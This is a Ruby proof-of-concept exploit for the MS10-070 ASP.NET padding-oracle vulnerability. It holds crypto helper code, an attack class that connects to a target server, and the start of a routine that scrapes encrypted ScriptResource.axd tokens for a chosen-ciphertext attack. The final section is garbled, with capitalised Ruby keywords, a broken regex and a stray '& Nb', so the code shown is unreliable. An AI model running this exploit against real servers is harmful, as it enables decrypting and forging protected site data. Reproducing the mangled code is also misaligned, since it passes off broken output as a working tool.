#!/usr/bin/ruby -w
#
# Aspx_ad_chotext_attack.rb
#
# Copyright (c) 2010 AmpliaSECURITY. All rights reserved
#
# http://www.ampliasecurity.com
# Agustin Azubel - aazubel@ampliasecurity.com
#
#
# MS10-070 ASPX proof of concept
# Decrypt data using an auto decryptor bundled in the aspx framework
# Encrypt data using Rizzo-Duong CBC-R technique
#
# Copyright (c) 2010 Amplia Security. All rights reserved.
#
# Unless you have express written permission from the Copyright
# Holder, any use of or distribution of this software or portions of it,
# including, but not limited to, reimplementations, modifications and derived
# work of it, in either source code or any other form, as well as any other
# software using or referencing it in any way, may NOT be sold for commercial
# gain, must be covered by this very same license, and must retain this
# copyright notice and this license.
# Neither the name of the Copyright Holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Standard-library dependencies: HTTP client, URI parsing and XML parsing.
%w[net/http uri rexml/document].each { |lib| require lib }

# Global flag, off by default (presumably a verbosity switch; it is not
# referenced anywhere in this part of the file).
$debugging = false
# Mixin for Array: a one-line debug dump built from each element's own
# #hex_inspect, prefixed with the element count.
module XArray
  # @return [String] "[<count>] [<elem dump>, <elem dump>, ...]"
  def hex_inspect
    element_dumps = map(&:hex_inspect)
    "[#{length}] [#{element_dumps.join(', ')}]"
  end
end
# Give every Array the XArray#hex_inspect dump helper.
Array.include(XArray)
require 'base64'

# URL-token flavour of Base64: '+' and '/' become '-' and '_', line breaks are
# dropped, and the run of trailing '=' is replaced by a single digit holding
# its count (0..2). This is presumably the alphabet the ScriptResource.axd
# "d=" regexp further down expects — confirm against the target's encoder.
class XBase64
  # @param s [String] raw bytes
  # @return [String] URL-safe token, always ending in the padding-count digit
  def self.encode(s)
    token = Base64.encode64(s).tr('+/', '-_').delete("\r\n")
    encode_base64_padding(token)
  end

  # Replaces the run of trailing '=' in +s+ by a digit giving how many there were.
  def self.encode_base64_padding(s)
    stripped = s.sub(/=*\z/, '')
    "#{stripped}#{s.length - stripped.length}"
  end

  # Inverse of .encode.
  # @param s [String] URL-safe token whose last character is the padding count
  # @return [String] decoded bytes (ASCII-8BIT)
  def self.decode(s)
    Base64.decode64(decode_base64_padding(s.tr('-_', '+/')))
  end

  # Drops the trailing count digit of +s+ and appends that many '=' characters.
  def self.decode_base64_padding(s)
    s[0...-1] + ('=' * s[-1, 1].to_i)
  end
end
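# Mixin for String: byte-wise XOR, a safe hex dump and fixed-size block
# splitting. All three work on bytes, never on characters.
module XString
  # Byte-wise XOR with +other+.
  # @param other [String] must have the same byte length as +self+
  # @return [String] binary (ASCII-8BIT) string of the same length
  # @raise [RuntimeError] when the byte lengths differ
  def xor(other)
    raise RuntimeError, 'length mismatch' if bytesize != other.bytesize
    # Work on byte values: since Ruby 1.9 String#[] yields one-char Strings,
    # so the old self[i] ^ other[i] form would re-enter this very method
    # (it is aliased to ^ below) instead of XOR-ing integers.
    bytes.zip(other.bytes).map { |a, b| a ^ b }.pack('C*')
  end
  alias ^ xor

  # Debug dump: "[<byte count>] "<bytes>"" with printable ASCII (0x20..0x7e)
  # shown as-is and every other byte as \xNN. Control bytes are always
  # escaped so a dump of server-supplied data cannot emit raw terminal
  # control sequences.
  # @return [String]
  def hex_inspect
    dumped = bytes.map do |byte|
      byte.between?(0x20, 0x7e) ? byte.chr : format("\\x%02x", byte)
    end
    "[#{bytesize}] \"#{dumped.join}\""
  end

  # Splits the string into consecutive +blocksize+-byte blocks; a trailing
  # partial block (fewer than +blocksize+ bytes) is dropped.
  # @param blocksize [Integer] positive block length in bytes
  # @return [Array<String>]
  # @raise [ArgumentError] if +blocksize+ is not a positive Integer
  def to_blocks(blocksize)
    unless blocksize.is_a?(Integer) && blocksize.positive?
      raise ArgumentError, 'blocksize must be a positive Integer'
    end
    (0...bytesize / blocksize).map { |i| byteslice(blocksize * i, blocksize) }
  end
end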
# Give every String the XString helpers (xor / ^, hex_inspect, to_blocks).
String.include(XString)
Class ASPXAutoDecryptorChosenCiphertextAttack
# Read-only access to the target settings and to the attack state. Apart from
# :base_mask, every field after :http is set to nil in #initialize.
attr_reader :uri, :filename, :min_filelength, :filere, :http, :d_value,
            :blocksize, :padding_length, :decrypt_command_mask,
            :axdpath, :axdname, :base_mask
# Builds the attack context from a parameters Hash (:uri, :filename,
# :min_filelength, :filere), opens the HTTP session and draws a random
# base_mask. The remaining fields start out nil (presumably filled in by
# later steps outside this part of the file). Prints the target and the mask.
# @param parameters [Hash] symbol-keyed options
def initialize(parameters)
  @uri = URI.parse(parameters[:uri])
  @filename, @min_filelength, @filere =
    parameters.values_at(:filename, :min_filelength, :filere)
  @http = http_initialize
  @base_mask = rand(0xffff)
  # Explicitly nil so the attr_readers are well defined before discovery.
  @d_value = @decrypt_command_mask = @blocksize = @padding_length = nil
  @axdpath = @axdname = nil
  puts "target: #{@uri}"
  puts format('base_mask: 0x%04x', @base_mask)
end
# Opens a persistent HTTP session to the target's host and port and returns it.
# NOTE(review): use_ssl is never set, so an https:// target would be contacted
# in cleartext on its port — confirm only http:// targets are expected.
# @return [Net::HTTP] an already-started connection
def http_initialize
  Net::HTTP.start(@uri.host, @uri.port)
end
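# Extracts the first capture group of +re+ from the src attribute of the first
# <script> element in +xml+.
# @param xml [String] a single <script ...></script> tag
# @param re [Regexp] must contain one capture group
# @return [String] the captured value
# @raise [RuntimeError] when there is no <script>, no src, or +re+ does not
#   match (the old code dereferenced a nil MatchData here and crashed with
#   NoMethodError instead)
# @raise [REXML::ParseException] when +xml+ is not well-formed
def parse_script_tag(xml, re)
  doc = REXML::Document.new(xml)
  script = doc.elements['script']
  # Regexp#match(nil) is nil, so a missing src attribute falls through to the raise.
  md = script && re.match(script.attributes['src'])
  raise RuntimeError, 'could not parse script_tag' unless md && md[1]
  md[1]
end
private :parse_script_tag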
Def get_ciphertext_sample
[["ScriptResource. axd", // ScriptResource. axd? D = ([a-zA-Z0-9-\ _] +) & t = [a-z0-9] +/],
]. Each do | name, re |
Headers = {User-Agent =>
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1 )}
Response = http. get uri. path, headers
Body = response. body
Script_tags = body. lines. select {| x. index name}
Next if script_tags.empty?
Puts "script tags using # {name} [# {script_tags.length}]:"
Puts script_tags.map {| x | "# {x }"}
D = parse_script_tag script_tags [0], re
Puts "using script: # {name }"
Puts "using d_value: # {d }"
& Nb